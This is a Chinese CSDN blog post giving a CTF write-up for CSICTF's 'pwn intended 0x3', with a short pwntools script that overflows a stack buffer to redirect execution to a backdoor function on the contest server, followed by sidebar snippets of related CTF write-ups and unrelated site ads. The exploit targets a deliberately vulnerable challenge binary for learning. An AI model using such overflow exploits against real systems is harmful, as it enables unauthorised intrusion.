【CSICTF】pwn intended 0x3 WriteUp

最新推荐文章于 2022-04-23 23:10:31 发布
最新推荐文章于 2022-04-23 23:10:31 发布
阅读量184 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/107460102
版权


和第二题不同了,这次是需要溢出覆盖ret addr

可以看到后门函数,地址是0x4011CE,并且程序没有开启PIE

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('chall.csivit.com',30013)
#io=process('./pwn-intended-0x3')
elf=ELF('./pwn-intended-0x3')

ra()
sl('a'*(0x20+8)+p64(0x4011CE))

io.interactive()

古月浪子
关注
CTF-pwn 2014-stkof writeup
Vicl1fe的博客
09-18 398
题目链接:Github 参考链接:传送门 堆的一些基础这里就不再介绍了,网上有很多,也可以加qq群一起讨论:946220807 准备开始正文 读懂题目 拿到题目,开启我们的IDA查看伪代码。运行程序并没有使用帮助,只能自己慢慢琢磨了。 可以看到输入不同的数字对应不同的函数(ida不同函数名可能也不同),共4个函数: fill() :这个函数用来向分配的空间填充数据。 free_chunk()...
CSICTF】Secret Society WriteUp
古月浪子的博客
07-23 307
这道题解题人数明显比前面三道题少了很多,不知道为啥 =_= 我感觉还是比较简单的 根本不需要读懂它到底在搞什么,只需要知道,我们让puts v5的时候连带着把s也输出出来就好了 其实这里的处理就是从换行符截断,然后在后面加上“,we are everywhere.”,因此,把v5的128字节写满即可。后面读flag的时候会覆盖掉,可以成功输出 from pwn import * from LibcSearcher import * from struct import pack context.os=.
CSICTF】RicknMorty WriteUp
古月浪子的博客
07-23 223
第一道逆向题 大致流程就是,随机给你出几道题,题目是这样的:给你2个不是太大的数,求最小公因数,然后计算最小公因数+3的阶乘 所有题目回答正确并且用时小于30秒就能获得flag 讲真的,这种程度的题目我室友应该能2秒一道口算出结果 我算不了这么快,还是老老实实上python脚本吧 这里借用一下pwn题的模板 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' contex.
CSICTFpwn intended 0x1 WriteUp
古月浪子的博客
07-23 173
一道pwn的签到题 v4的长度为0x30-4,使用的是gets函数读取输入,所以可以溢出 只要满足v5不等于0就可以拿到flag,于是通过溢出修改v5的值即可 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) sl=lambda x:io.
CSICTF 部分逆向wp
苗_的博客
07-29 417
RicknMorty 整个看下来逻辑就是,随机出现两个数,找到他们的最小公因数,然后+3求阶乘。(在30s内算完所有即可) (当时没有用脚本,直接计算器走一波就出来了) 附上脚本: from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) s
pwn刷题num17-----格式化字符串泄露canary+栈溢出
tbsqigongzi的博客
04-23 1232
攻防世界pwn进阶区Mary_Morton 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行后,选1是栈溢出,选2是格式化字符串溢出,选3是退出程序 ida一下主函数 简单的程序,三种选择,选1进入stack()函数 buf占0x90字节,read函数读入0x100字节,寻找
Xman pwn guess_num writeup
qq_39596232的博客
08-24 954
题目描述: 菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 分析思路: 1、首先查看一下文件详细信息: tucker@ubuntu:~/pwn$ file guess_num guess_num: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter ...
Xman pwn int_overflow writeup
qq_39596232的博客
08-25 573
题目描述: 菜鸡感觉这题似乎没有办法溢出,真的么? 分析思路: 1、首先查看一下文件的详细信息,以及相关的安全机制: tucker@ubuntu:~/pwn$ file int_overflow int_overflow: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, inter...
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 668
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 486
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
攻防世界PWNpwn11题解
seaaseesa的博客
02-09 712
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
CSICTF2020随缘Writeup
sash1mi
02-06 3444
CSICTF2020随缘Writeup 国外的一个CTF比赛,题目难度适中,这里附上源码及下载地址 https://github.com/k3vin-3/CSICTF2020 Web Cascade 考点:CSS文件 按F12直接在Network中查看CSS文件,拿到flag csictf{w3lc0me_t0_csictf} CCC 考点:jwt、文件包含 在右侧菜单栏中Our Admins和Login不能直接点开,但是通过源代码可以看到链接了两个地址:/adminNames和/login,访问/a
CSICTF】Esrever WriteUp
古月浪子的博客
07-23 570
这道题看起来不像是逆向,更像是密码学 =_= import random # TODO: Remember to remove real flag before deploying flag = 'csictf{fake_flag}' key = 'fake_key' def enc1(text): r = random.randint(1,25) return bytes.fromhex(''.join([hex(((ord(i) - ord('a') - r) % 26) + o.
CSICTF】pydis2ctf WriteUp
古月浪子的博客
07-23 632
这题我感觉我做的有问题,最后虽然答案是勉强凑出来了 题目给了3个附件 cipher1: 2 0 LOAD_CONST 1 ('') 2 STORE_FAST 1 (ret_text) 3 4 LOAD_GLOBAL 0 (list) 6 LOAD_FAST 0 (text) .
基于Java的家庭理财系统设计与开发-金融管理-家庭财产管理-实用性强
11-07
内容概要:文章探讨了互联网时代的背景下开发一个实用的家庭理财系统的重要性。文中分析了国内外家庭理财的现状及存在的问题,阐述了开发此系统的目的——对家庭财产进行一体化管理,提供统计、预测功能。系统涵盖了家庭成员管理、用户认证管理、账单管理等六大功能模块,能够满足用户多方面查询及统计需求,并保证数据的安全性与完整性。设计中运用了先进的技术栈如SSM框架(Spring、SpringMVC、Mybatis),并采用MVC设计模式确保软件结构合理高效。 适用人群:对于希望科学地管理和规划个人或家庭财务的普通民众;从事财务管理相关专业的学生;有兴趣于家政学、经济学等领域研究的专业人士。 使用场景及目标:适用于日常家庭财务管理的各个场景,帮助用户更好地了解自己的消费习惯和资金状况;为目标客户提供一套稳定可靠的解决方案,助力家庭财富增长。 其他说明:文章还包括系统设计的具体方法与技术选型的理由,以及项目实施过程中的难点讨论。对于开发者而言,不仅提供了详尽的技术指南,还强调了用户体验的重要性。
弹性盒子Flexbox布局.docx
最新发布
11-07
弹性盒子Flexbox布局.docx
网络财务系统 SSM毕业设计 附带论文.zip
11-07
网络财务系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
联想电脑的bios设置
11-07
联想电脑的bios设置、图文都有
python3下载pwn
12-27
在Python 3中下载pwn模块,你可以使用pip3来安装。以下是安装pwn模块的步骤: 1. 打开终端。 2. 运行以下命令来安装pwn模块: ```shell pip3 install pwntools ``` 这将会自动下载并安装pwn模块。 安装完成后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值